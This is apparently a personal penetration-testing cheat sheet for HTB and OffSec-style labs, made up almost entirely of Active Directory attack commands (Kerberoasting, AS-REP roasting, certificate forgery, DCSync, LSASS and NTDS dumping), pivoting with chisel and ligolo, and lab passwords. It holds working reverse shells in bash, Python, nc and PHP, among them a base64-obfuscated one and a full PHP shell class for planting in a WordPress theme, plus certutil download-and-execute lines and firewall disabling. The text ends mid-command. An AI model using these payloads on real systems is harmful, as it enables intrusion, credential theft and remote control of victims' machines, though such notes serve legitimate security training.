bloodhound-python -u user -p pass -d domain -ns DC_IP -c All bloodhound-python --dns-tcp -c ALL -u ldap -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; -d support.htb -ns 10.10.11.174 python3 /usr/bin/bloodhound-python --dns-tcp -ns 10.129.6.151 -d support.htb -u \u0026#39;ldap\u0026#39; -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; -c all --zip Swtich from java 21 to java 17 sudo update-alternatives --config java viewing it sudo neo4j start **neo4j:neo4j** **OR collect w python and upload on the one i have in windows go TOOLS and use bloodhound from there after starting neo4j ./bin/neo4j start ./BloodHound --disable-gpu --no-sandbox** wget \u0026lt;https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound.exe\u0026gt; upload SharpHound.exe .\\\\\\\\SharpHound.exe -c All download \u0026lt;generated_zip_name\u0026gt; DOCKER # sudo apt update sudo apt install -y docker.io docker-compose sudo systemctl enable --now docker sudo usermod -aG docker $USER newgrp docker curl -L https://ghst.ly/getbhce | BLOODHOUND_PORT=8888 docker compose -f - up visit http://localhost:8888 username admin and temp password** **# Stop everything** docker stop $(docker ps -aq) docker rm $(docker ps -aq) **# Remove ALL related volumes (critical step)** docker volume rm $(docker volume ls -q | grep -E \u0026#34;(medtech|bloodhound|neo4j|postgres)\u0026#34;) 2\u0026gt;/dev/null || true docker volume prune -f **# Also remove any local data directories if they exist** sudo rm -rf ./medtech-data 2\u0026gt;/dev/null || true **** docker compose down -v OR use netexec netexec ldap $target -u \u0026#39;judith.mader\u0026#39; p judith09 --bloodhound --collection All --dns-server $target Update this password everytime u run just incase\nrMoKGf3jGTQEzVMzsNdPoehQHWuF635Q Sharphound if needed # cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 . iwr -uri http://192.168.119.5:8000/SharpHound.ps1 -Outfile SharpHound.ps1 powershell -ep bypass . .\\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All or with exe .\\SharpHound.exe -c All --Domain secura.yzx --DomainController 192.168.122.97 Rubeus # Rubeus.exe asktgt /user:administrator /certificate:C:\\\\\\\\\\\\\\\\programdata\\\\\\\\\\\\\\\\cert.pfx Certify / Certipy-ad # netexec ldap \u0026lt;DC_IP\u0026gt; -u user -p \u0026#39;password\u0026#39; -M adcs http://github.com/ly4k/Certipy/wiki/06—-Privilege-Escalation\npowershell -ep bypass -c \u0026#34;. .\\\\\\\\\\\\\\\\Certify.ps1; Invoke-Certify\u0026#34; use -hashes to pass hash certipy-ad find -u test@test.local -p \u0026#39;test\u0026#39; -dc-ip target -vulnerable -stdout certipy-ad find -u test@test.local -p \u0026#39;test\u0026#39; -dc-ip target -text -output certs Lets check for vulnerable templates\ncertipy-ad find -u test@test.local -p \u0026#39;test\u0026#39; -dc-ip target -vulnerable -stdout certipy-ad find -u test@test.local -p \u0026#39;test\u0026#39; -dc-ip target -text -output certs cat -n certs_Certipy.txt | grep -iC4 \u0026#39;enrollment rights\u0026#39; | grep -viE \u0026#34;Enterprise Admins|Domain Admins|Domain Controllers\u0026#34; | fgrep -i \u0026#39;\\\\\\\\\u0026#39; Forge Certificate\ncertipy req -u \u0026#39;test@test.local\u0026#39; -p \u0026#39;test\u0026#39; -dc-ip \u0026#39;10.0.0.100\u0026#39; -target \u0026#39;CA.TEST.LOCAL\u0026#39; -ca \u0026#39;TEST-CA\u0026#39; -template \u0026#39;UserTemplate\u0026#39; -upn -Administrator@corp.local\u0026#39; Get Hash for specific user\ncertipy auth -pfx \u0026#39;administrator.pfx\u0026#39; -dc-ip \u0026#39;10.10.10.10\u0026#39; get shell with psexec next\nResponder # sudo responder -I tun0 NTLMtheft # python3 ntlm_theft.py -g lnk -s 192.168.45.160 -f vault upload vault and then impacket-smbserver test . -smb2support Enum4linux # enum4linux -a $target ASEP-ROASTING # impacket-GetNPUsers vulnnet-rst.local/ -dc-ip $target -usersfile usernames.txt -format john -outputfile hashes.txt john hashes.txt or with netexec\nnetexec ldap $target -u \u0026#39;users2\u0026#39; -p \u0026#39;\u0026#39; -k --dns-server $target netexec ldap $target -u \u0026#39;users2\u0026#39; -p \u0026#39;\u0026#39; -k --asreproast asrep.txt or --asrep hash john --wordlist=/usr/share/wordlists/rockyou.txt asrep.txt --format=krb5asrep Kerberoasting # impacket-GetUserSPNs -dc-ip $target \u0026#39;vulnet-rst.local/t-skid:tj072889=\u0026#39; -request └─$ john --format=krb5tgs hash.txt --wordlist=/usr/share/wordlists/rockyou.txt hashcat -m 13100 timedatectl set-ntp off rdate -n $target or use --kerberoast impacket-getTGT \u0026#39;pirate.htb/MS01$:ms01\u0026#39; -dc-ip ipaddr if no creds and direct rce\ncertutil -urlcache -split -f http://192.168.x.x/Get-SPN.ps1 powershell -ExecutionPolicy Bypass .\\Get-SPN.ps1 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \u0026#39;MSSQLSvc/DC.access.offsec\u0026#39; **now we can kerberoast** powershell iwr http://192.168.45.177/Invoke-Kerberoast.ps1 -outfile Invoke-Kerberoast.ps1 .\\Invoke-Kerberoast.ps1 or Rubeus .\\\\Rubeus.exe kerberoast /outfile:kerberoast.hashes Kerbrute username eval # /home/kali/Desktop/Boxes/Administrator/kerbrute userenum --dc 10.129.16.174 -d manager.htb users2.txt Targeted Kerberoasting # source venv/bin/activate uv add --script targetedKerberoast.py -r requirements.txt sudo ntpdate administrator.htb uv run targetedKerberoast.py -v -d \u0026#39;administrator.htb\u0026#39; -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb or **python targetedKerberoast.py -v -d \u0026#39;administrator.htb\u0026#39; -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb** DNSrecon # dnsrecon -d \u0026#39;EGOTISTICAL_BANK.LOCAL\u0026#39; -n $target RID brute / Username Enum # git clone \u0026lt;https://github.com/mohinparamasivam/AD-Username-Generator\u0026gt; python3 [username-generate.py](\u0026lt;http://username-generate.py\u0026gt;) -u user -o generated.txt crackmapexec smb $target -u enterprise-core-vn -p \u0026#39;lalala\u0026#39; --rid-brute **try --users asw** try over different service like ldap asw or wmi or winrm , rdp guess GUEST netexec ldap $target -u lparker -p \u0026#39;password\u0026#39; --users one liner for pasting\nnetexec ldap $target -u \u0026#39;\u0026#39; -p \u0026#39;\u0026#39; --users | \u0026#39;{print$ 5}\u0026#39; | fgrep -v \u0026#39;[*]\u0026#39; | tee users2 netexec smb blackfield.local -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; --rid-brute | grep \u0026#34;SidTypeUser\u0026#34; | awk -F\u0026#39;\\\\\\\\\\\\\\\\\u0026#39; \u0026#39;{print $2}\u0026#39; | awk \u0026#39;{print $1}\u0026#39; \u0026gt; users.txt PSEXEC / WMIEEXEC / PASSTHEHASH # rlwrap impacket-psexec vulnnet-rst.local/a-whitehat:bNdKVKjv@$target rlwrap impacket-wmiexec vulnnet-rst.local/a-whitehat:bnafajfa@$target rlwrap impacket-psexec egostical-bank.local/administrator@target -hashes :8345adawdac Secretsdump-DCSYNC # impacket-secretsdump -just-dc-ntlm vulnnet-rst.local/whitehat:\u0026#39;akdfjakfaklf\u0026#39;@$target Checking smb w Creds # crackmapexec smb #target -u \u0026#39;ADministrator\u0026#39; -H or -P Checking smb Anon # netexec smb $target -u -p ‘’ reveals host crackmapexec smb support.htb --shares WMI ANON # rpcclient -u \u0026#34;\u0026#34; -n $target enumdom users Shadow Creds w Certipy —\u0026gt; GenericAll # certipy-ad shadow auto -u krishna@ignite.local -p Password@1 -account management_svc -H start with :NT part certipy-ad shadow auto \\\\\\\\ -u Olivia@administrator.htb \\\\\\\\ -p \u0026#39;ichliebedich\u0026#39; \\\\\\\\ -account michael \\\\\\\\ -dc-ip 10.129.16.22 \\\\\\\\ -target dc.administrator.htb if clock not synchronized then rdate -n $target rerun if certipy breaks and shows some nbefore error reinstall it sudo apt remove certipy-ad pip install --break-system-packages certipy-ad==4.8.2 PGP # gpg --decrypt credential.pgp if u see asc then gpg2john tryhackme.asc \u0026gt; hash.txt adn then john it Cadaver # cadaver http://192.168.45.159 5. Access and Pivoting # Check Routing Table # route print Switching Users # Runas\n. .\\Invoke-RunasCs.ps1 Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command cmd.exe -Remote 192.168.45.177:443 Discovery # route ip route netexec smb 10.0.2.0/24 or ips --\u0026gt; to discover the ips fping -qag 192.168.98.0/24 | tee ips or grab nmap ./nmap -V -sn 10.200.85.0/24 --open or cat /proc/net/lib_tne cat /proc/net/dev cat /proc/net/arp Access # sshuttle # sshuttle -r user@IP 10.129.4.0/24| chisel # ./chisel server -p 8000 --reverse ./chisel client \u0026lt;ATTACKER_IP\u0026gt;:8000 R:3306:127.0.0.1:3306 ./chisel client 10.10.14.66:8000 R:3306:127.0.0.1:3306 or chisel server -p 8081 --reverse || chisel server -p 8081 --reverse --socks5 ./chisel client 10.10.10.10:8081 R:socks || ./chisel client 10.10.10.10:8081 R:socks**5** make sure its gedit /etc/proxychains4.conf socks5 127.0.0.1 1080 now u can do proxychains -q \u0026lt;command\u0026gt; || proxychains -q nmap -sT \u0026lt;ipaddr\u0026gt; -p -Pn -v now over browser change proxy to socks 1080 localhost Socks5 Ligolo # Ligolo portforwarding\ngrab ligolo proxy and agent, proxy on the linux tar -xvf now grab windows agent cd c:\\\\windows\\\\tasks wget agent.exe -o agent.exe **sudo ./proxy -selfcert** then connect back from agent **.\\\\agent.exe -connect 10.0.0.12:11601 -ignore-cert listener_add --addr 0.0.0.0:9090 --to 127.0.0.1:8080** Ligolo Tunneling\nFind the network mask, for example, if your IP address is X.X.X.X and the subnet mask is Y.Y.Y.Y, the network will be X.X.X.X/ followed by the subnet prefix. For instance, with a subnet mask of 255.255.255.0, the network prefix would be /24. Create the interface for ligolo in my Kali sudo ip tuntap add user [kali_user] mode tun ligolo sudo ip link set ligolo up Enable the proxy server on the attacker machine # The option -selfcert is for not using a certificate (this will make our communications in clear text), we do not need to encrypt them for the exam. ./ligolo_proxy_linux -selfcert or ./ligolo_proxy_linux -selfcert -port \u0026lt;DIFFERENT_PROXY_PORT\u0026gt; Download (bring) the agent program to the victim (in this example Windows) iwr -uri http://[attacker_ip]/ligolo_agent_windows.exe -UseBasicParsing -Outfile ligolo_agent_windows.exe Start the client # The port is the default one, we could also change it if needed. ./ligolo_agent_windows.exe -connect [attacker_ip]:11601 -ignore-cert or ./ligolo_agent_windows.exe -connect [attacker_ip]:\u0026lt;DIFFERENT_PROXY_PORT\u0026gt; -ignore-cert Add the route in the Kali # Run this command in other terminal that from the one where ligolo proxy is running sudo ip route add [internal_submask]/24 dev ligolo # Verify routing table ip route list Finish setting up the tunneling session # Run this commands in the ligolo proxy terminal » session » start # After this the tunneling should be ready, you could perform any command. Now to Access a port inside one of the machines lets say 192.168.122.121 —\u0026gt; 172.16.122.10 ( 127.0.0.1 : 80 )\nWhen you run listener_add in ligolo, it binds to the agent\u0026rsquo;s localhost (the machine running ligolo_agent.exe), not arbitrary machines in the subnet.\nSo if your agent is on 172.16.122.10, this:\nRun ligolo_agent.exe on each target (172.16.122.10, 172.16.122.11, etc.), then: bash Copy » session # see all sessions » session 1 # select 172.16.122.10 » listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp » session 2 # select 172.16.122.11 » listener_add --addr 0.0.0.0:8081 --to 127.0.0.1:80 --tcp Access: 172.16.122.10\u0026#39;s localhost:80 → http://kali:8080 172.16.122.11\u0026#39;s localhost:80 → http://kali:8081 Option 2: Double Pivot (Agent on .10 reaches .11\u0026#39;s localhost) Another method to access\nWe set up ligolo first\nsudo ip tuntap add user kali mode tun ligolo sudo ip link set ligolo up ligolo-proxy -selfcert On target\n.\\agent.exe -connect 192.168.10.10:11601 -ignore-cert add route to the subnet\nsudo ip route add 10.10.10.0/24 dev ligolo tunnel_start Now to access something thats inside the localhost of a subnet\nTransfer chisel.exe to victim and then\nlisten_add -addr 0.0.0.0:8888 --to 127.0.0.1:8000 Turn off the firewall\nnetsh advfirewall set allprofiles state off and then run the chisel server on kali\nchisel server --reverse --port 8000 then on the victim\n.\\chisel.exe client 10.10.10.102:8888 R:localhost:127.0.0.1:1433 Sensitive Store / Dumps # SEBackupPrivilege # On kali create a file called viper.dsh with the content set context persistent nowriters add volume c: alias viper create expose %viper% x: unix2dos viper.dsh cd c:\\\\windows\\\\tasks powershell -c iwr -url \u0026lt;http://10.10.10.10/viper.dsh\u0026gt; -o viper.dsh or setup smb share, set it up anwyas\nimpacket-smbserver share ./ -smb2support -user test -pass \u0026#39;\u0026#39; and then\ndiskshadow /s viper.dsh robocopy /b x:\\\\windows\\\\ntds . ntds.dit reg save hklm\\\\system c:\\\\windows\\\\tasks\\\\system reg save hklm\\\\sam c:\\\\windows\\\\tasks\\\\sam net use \\\\\\\\10.10.10.10.\\\\share /user:test copy sam, ntds.dit, system \\\\\\\\10.10.10.10\\\\share and now finally dump it\nimpacket-secretsdump -ntds ntds.dit -system system -sam sam local | tee dmp.txt netexec - Hashdump - CREDS # netexec smb $target -u \u0026#39;admin\u0026#39; -p \u0026#39;Password\u0026#39; -M nanodump --\u0026gt; to dump lsass netexec smb $target -u \u0026#39;admin\u0026#39; -p \u0026#39;Password\u0026#39; -M lsassy netexec smb $target -u \u0026#39;admin\u0026#39; -p \u0026#39;Password\u0026#39; --lsa --\u0026gt; LSA creds nxc smb 192.168.1.0/24 -u UserName -p \u0026#39;PASSWORDHERE\u0026#39; --sam nxc ldap \u0026lt;ip addr\u0026gt; -u -p --laps --\u0026gt; LAPS nxc ldap \u0026lt;ip addr\u0026gt; -u -p -M laps --\u0026gt; LAPS netexec smb $target -u \u0026#39;admin\u0026#39; -p \u0026#39;Password\u0026#39; --ntds if creds dont work try --local-auth if lsa hash then u have to crack it if ntlm hash then visit ntlm.pw john --wordlist=/usr/share/wordlists/rockyou.txt --format=mscash2 mscash_hashes Keepass # keepass2john keepass2john CEH.kdbx \u0026gt; CEH.kdbx.hash hashcat CEH.kdbx.hash /usr/share/wordlists/rockyou.txt strings -e S KeePassDumpFull.dmp | grep -a $(printf \u0026#34;%b\u0026#34; \u0026#34;\\\\\\\\xCF\\\\\\\\x25\\\\\\\\xCF\\\\\\\\x25\u0026#34;) go windows and dotnet run the .dmp file or when only kdbx file is there use john or hashcat to crack it keepass2john passcodes.kdbx hashcat hash.txt /usr/share/wordlists/rockyou.txt --user -m 13400 and then use it with kplci kpcli --kdb CEH.kdbx show -f [num] 6. Shells # webshell aspx # /usr/share/webshells/aspx/cmdasp.aspx simple cron # #!/bin/bash cp /bin/bash /tmp/bash chmod +s /tmp/bash then sudo the command /tmp/bash -p postgres revshell # https://github.com/squid22/PostgreSQL_RCE Linux Upgrade # python -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; stty raw -echo; fg export TERM=xterm echo $SHELL ps -p $$ -o comm= stty -a stty raw -echo;fg —\u0026gt; hit enter twice stty rows stty cols cat /etc/shells python —version then if u have bin/sh u can do python -c ‘import pty; pty.spawn(”/bin/bash”)’ otherwise do perl help and if perl is there perl -e ‘exec “/bin/bash”; ‘ or ruby: exec “/bin/bash” /bin/bash -i script /dev/null -c bash export TERM=xterm stty rows 40 columns 120 Base64 # base64 -d password.txt Python reverse shell # python -c \u0026#39;import socket,os,pty;s=socket.socket();s.connect((\u0026#34;YOUR_HTB_IP\u0026#34;,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; Bash reverse shell # bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/YOUR_HTB_IP/4444 0\u0026gt;\u0026amp;1\u0026#39; NC reverse shell # nc YOUR_HTB_IP 4444 -e /bin/bash mkfifo /tmp/f; nc YOUR_HTB_IP 4444 \u0026lt; /tmp/f | /bin/bash \u0026gt; /tmp/f 2\u0026gt;\u0026amp;1; rm /tmp/f PHP reverse shell # (Full original pentestmonkey code preserved here exactly as you provided.)\n\u0026lt;?php `echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTA0LzQ0NDQgMD4mMSAK|base64 -d |bash`; ?\u0026gt; ?page=phar:///var/www/html/uploads/archive.phar/test.txt ncat # ncat -e /bin/bash 192.168.1.44 1234 BusyBox # http://plan.bitforge.lab/www//upload/files/5hjchl/u69.php?cmd=busybox%20nc%20192.168.45.159%203306%20-e%20bash Socat Upgrade # socat file:`tty`,raw,echo=0 tcp-listen:4444 --\u0026gt;attacker socat exec:\u0026#39;bash -li\u0026#39;,pty,stderr,setsid,sigint,sane tcp:192.168.45.227:4444 --\u0026gt; victim LibreOffice revshell ODT # https://medium.com/@Dpsypher/proving-grounds-practice-craft-4a62baf140cc Upgrade Through Python Server # linux # cat \u0026lt;\u0026lt;EOF \u0026gt; rev.sh #!/bin/bash bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.45.181/7777 0\u0026gt;\u0026amp;1 EOF then from the rev shell type\nbash rev.sh RCE → Rev shell # pyhon3 poc.py \u0026lt;ip\u0026gt; \u0026#34;curl http://\u0026lt;your-ip\u0026gt;/shell.sh -o /tmp/shell.sh\u0026#34; python3 poc.py \u0026lt;ip\u0026gt; \u0026#34;chmod +x /tmp/shell.sh\u0026#34; python3 poc.py \u0026lt;ip\u0026gt; \u0026#34;/tmp/shell.sh\u0026#34; windows # certutil -urlcache -split -f [http://192.168.45.159:80/nc.exe](http://192.168.45.159/nc.exe) C:/Users/Public/Documents/nc.exe cmd.exe /c C:/Users/Public/Documents/nc.exe -e cmd.exe 192.168.45.159 4444 WordPress # msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.150 LPORT=4444 -f exe -o 64.exe we can paste this in the theme header\n\u0026lt;?php exec(\u0026#34;certutil -urlcache -split -f \u0026lt;http://192.168.45.176/64.exe\u0026gt; C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\64.exe\u0026#34;); exec(\u0026#34;C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\64.exe\u0026#34;); ?\u0026gt; now visit http://192.168.208.55/shenzi/themes/twentytwenty/404.php after editing 404\nor\nediting the theme header with this\n\u0026lt;?php // Copyright (c) 2020 Ivan Sincek // v2.3 // Requires PHP v5.0.0 or greater. // Works on Linux OS, macOS, and Windows OS. // See the original script at https://github.com/pentestmonkey/php-reverse-shell. class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;r\u0026#39;), // shell can read from STDIN 1 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;w\u0026#39;), // shell can write to STDOUT 2 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;w\u0026#39;) // shell can write to STDERR ); private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function __construct($addr, $port) { $this-\u0026gt;addr = $addr; $this-\u0026gt;port = $port; } private function detect() { $detected = true; if (stripos(PHP_OS, \u0026#39;LINUX\u0026#39;) !== false) { // same for macOS $this-\u0026gt;os = \u0026#39;LINUX\u0026#39;; $this-\u0026gt;shell = \u0026#39;bash\u0026#39;; } else if (stripos(PHP_OS, \u0026#39;WIN32\u0026#39;) !== false || stripos(PHP_OS, \u0026#39;WINNT\u0026#39;) !== false || stripos(PHP_OS, \u0026#39;WINDOWS\u0026#39;) !== false) { $this-\u0026gt;os = \u0026#39;WINDOWS\u0026#39;; $this-\u0026gt;shell = \u0026#39;cmd.exe\u0026#39;; } else { $detected = false; echo \u0026#34;SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n\u0026#34;; } return $detected; } private function daemonize() { $exit = false; if (!function_exists(\u0026#39;pcntl_fork\u0026#39;)) { echo \u0026#34;DAEMONIZE: pcntl_fork() does not exists, moving on...\\n\u0026#34;; } else if (($pid = @pcntl_fork()) \u0026lt; 0) { echo \u0026#34;DAEMONIZE: Cannot fork off the parent process, moving on...\\n\u0026#34;; } else if ($pid \u0026gt; 0) { $exit = true; echo \u0026#34;DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n\u0026#34;; } else if (posix_setsid() \u0026lt; 0) { // once daemonized you will actually no longer see the script\u0026#39;s dump echo \u0026#34;DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n\u0026#34;; } else { echo \u0026#34;DAEMONIZE: Completed successfully!\\n\u0026#34;; } return $exit; } private function settings() { @error_reporting(0); @set_time_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str_replace(\u0026#39;\u0026lt;\u0026#39;, \u0026#39;\u0026amp;lt;\u0026#39;, $data); $data = str_replace(\u0026#39;\u0026gt;\u0026#39;, \u0026#39;\u0026amp;gt;\u0026#39;, $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this-\u0026gt;error = true; // set global error flag echo \u0026#34;STRM_ERROR: Cannot read from ${name}, script will now exit...\\n\u0026#34;; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this-\u0026gt;error = true; // set global error flag echo \u0026#34;STRM_ERROR: Cannot write to ${name}, script will now exit...\\n\u0026#34;; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this-\u0026gt;read($input, $iname, $this-\u0026gt;buffer)) \u0026amp;\u0026amp; $this-\u0026gt;write($output, $oname, $data)) { if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39; \u0026amp;\u0026amp; $oname === \u0026#39;STDIN\u0026#39;) { $this-\u0026gt;clen += strlen($data); } // calculate the command length $this-\u0026gt;dump($data); // script\u0026#39;s dump } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat[\u0026#39;size\u0026#39;]; if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39; \u0026amp;\u0026amp; $iname === \u0026#39;STDOUT\u0026#39; \u0026amp;\u0026amp; $this-\u0026gt;clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this-\u0026gt;clen \u0026gt; 0 \u0026amp;\u0026amp; ($bytes = $this-\u0026gt;clen \u0026gt;= $this-\u0026gt;buffer ? $this-\u0026gt;buffer : $this-\u0026gt;clen) \u0026amp;\u0026amp; $this-\u0026gt;read($input, $iname, $bytes)) { $this-\u0026gt;clen -= $bytes; $size -= $bytes; } } while ($size \u0026gt; 0 \u0026amp;\u0026amp; ($bytes = $size \u0026gt;= $this-\u0026gt;buffer ? $this-\u0026gt;buffer : $size) \u0026amp;\u0026amp; ($data = $this-\u0026gt;read($input, $iname, $bytes)) \u0026amp;\u0026amp; $this-\u0026gt;write($output, $oname, $data)) { $size -= $bytes; $this-\u0026gt;dump($data); // script\u0026#39;s dump } } public function run() { if ($this-\u0026gt;detect() \u0026amp;\u0026amp; !$this-\u0026gt;daemonize()) { $this-\u0026gt;settings(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this-\u0026gt;addr, $this-\u0026gt;port, $errno, $errstr, 30); if (!$socket) { echo \u0026#34;SOC_ERROR: {$errno}: {$errstr}\\n\u0026#34;; } else { stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns \u0026#39;true\u0026#39; on Windows OS // ----- SHELL BEGIN ----- $process = @proc_open($this-\u0026gt;shell, $this-\u0026gt;descriptorspec, $pipes, null, null); if (!$process) { echo \u0026#34;PROC_ERROR: Cannot start the shell\\n\u0026#34;; } else { foreach ($pipes as $pipe) { stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns \u0026#39;false\u0026#39; on Windows OS } // ----- WORK BEGIN ----- $status = proc_get_status($process); @fwrite($socket, \u0026#34;SOCKET: Shell has connected! PID: \u0026#34; . $status[\u0026#39;pid\u0026#39;] . \u0026#34;\\n\u0026#34;); do { $status = proc_get_status($process); if (feof($socket)) { // check for end-of-file on SOCKET echo \u0026#34;SOC_ERROR: Shell connection has been terminated\\n\u0026#34;; break; } else if (feof($pipes[1]) || !$status[\u0026#39;running\u0026#39;]) { // check for end-of-file on STDOUT or if process is still running echo \u0026#34;PROC_ERROR: Shell process has been terminated\\n\u0026#34;; break; // feof() does not work with blocking streams } // use proc_get_status() instead $streams = array( \u0026#39;read\u0026#39; =\u0026gt; array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR \u0026#39;write\u0026#39; =\u0026gt; null, \u0026#39;except\u0026#39; =\u0026gt; null ); $num_changed_streams = @stream_select($streams[\u0026#39;read\u0026#39;], $streams[\u0026#39;write\u0026#39;], $streams[\u0026#39;except\u0026#39;], 0); // wait for stream changes | will not wait on Windows OS if ($num_changed_streams === false) { echo \u0026#34;STRM_ERROR: stream_select() failed\\n\u0026#34;; break; } else if ($num_changed_streams \u0026gt; 0) { if ($this-\u0026gt;os === \u0026#39;LINUX\u0026#39;) { if (in_array($socket , $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($socket , $pipes[0], \u0026#39;SOCKET\u0026#39;, \u0026#39;STDIN\u0026#39; ); } // read from SOCKET and write to STDIN if (in_array($pipes[2], $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($pipes[2], $socket , \u0026#39;STDERR\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDERR and write to SOCKET if (in_array($pipes[1], $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($pipes[1], $socket , \u0026#39;STDOUT\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDOUT and write to SOCKET } else if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39;) { // order is important if (in_array($socket, $streams[\u0026#39;read\u0026#39;])/*------*/) { $this-\u0026gt;rw ($socket , $pipes[0], \u0026#39;SOCKET\u0026#39;, \u0026#39;STDIN\u0026#39; ); } // read from SOCKET and write to STDIN if (($fstat = fstat($pipes[2])) \u0026amp;\u0026amp; $fstat[\u0026#39;size\u0026#39;]) { $this-\u0026gt;brw($pipes[2], $socket , \u0026#39;STDERR\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDERR and write to SOCKET if (($fstat = fstat($pipes[1])) \u0026amp;\u0026amp; $fstat[\u0026#39;size\u0026#39;]) { $this-\u0026gt;brw($pipes[1], $socket , \u0026#39;STDOUT\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDOUT and write to SOCKET } } } while (!$this-\u0026gt;error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo \u0026#39;\u0026lt;pre\u0026gt;\u0026#39;; // change the host address and/or port number as necessary $sh = new Shell(\u0026#39;192.168.45.159\u0026#39;, 4444); $sh-\u0026gt;run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc_collect_cycles(); echo \u0026#39;\u0026lt;/pre\u0026gt;\u0026#39;; ?\u0026gt; on clicking update we get a shell lol\n7. File Transfer # Transferring with SMB # On host impacket-smbserver share ./ -smb2support -user test -pass \u0026#39;\u0026#39; on client net use \\\\\\\\10.10.10.10.\\\\share /USER:test copy \\\\\\\\10.10.10.10.\\\\share\\\\* Transferring with NC # on kali nc -lvnp 9001 \u0026gt; log.zip on victim nc 10.10.14.82 9001 \u0026lt; 2026-2-9.log.zip do md5sum filenmame bothways to verify content Transferring with scp # scp /path/to/local/file username@remote_host:/path/to/remote/directory MISC # Client Side Attacks # Library # For this attack, we have to set up a WebDAV server, a Python3 web server, a Netcat listener, and prepare the Windows Library and shortcut files.\nSet up WebDAV share on kali\nmkdir /home/kali/beyond/webdav /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/ Set up Library\nOpen visual studio code, create new file on desktop named as config.Library-ms\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; \u0026lt;libraryDescription xmlns=\u0026#34;http://schemas.microsoft.com/windows/2009/library\u0026#34;\u0026gt; \u0026lt;name\u0026gt;@windows.storage.dll,-34582\u0026lt;/name\u0026gt; \u0026lt;version\u0026gt;6\u0026lt;/version\u0026gt; \u0026lt;isLibraryPinned\u0026gt;true\u0026lt;/isLibraryPinned\u0026gt; \u0026lt;iconReference\u0026gt;imageres.dll,-1003\u0026lt;/iconReference\u0026gt; \u0026lt;templateInfo\u0026gt; \u0026lt;folderType\u0026gt;{7d49d726-3c21-4f05-99aa-fdc2c9474656}\u0026lt;/folderType\u0026gt; \u0026lt;/templateInfo\u0026gt; \u0026lt;searchConnectorDescriptionList\u0026gt; \u0026lt;searchConnectorDescription\u0026gt; \u0026lt;isDefaultSaveLocation\u0026gt;true\u0026lt;/isDefaultSaveLocation\u0026gt; \u0026lt;isSupported\u0026gt;false\u0026lt;/isSupported\u0026gt; \u0026lt;simpleLocation\u0026gt; **\u0026lt;url\u0026gt;http://192.168.119.5\u0026lt;/url\u0026gt;** \u0026lt;/simpleLocation\u0026gt; \u0026lt;/searchConnectorDescription\u0026gt; \u0026lt;/searchConnectorDescriptionList\u0026gt; \u0026lt;/libraryDescription\u0026gt; save it and transfer to /home/kali/beyond\nnext create a shortcut file on windows, right click on desktop and select New \u0026gt; Shortcut. A victim double clicking the shortcut file will download powercat and create a revshell.\npowershell.exe 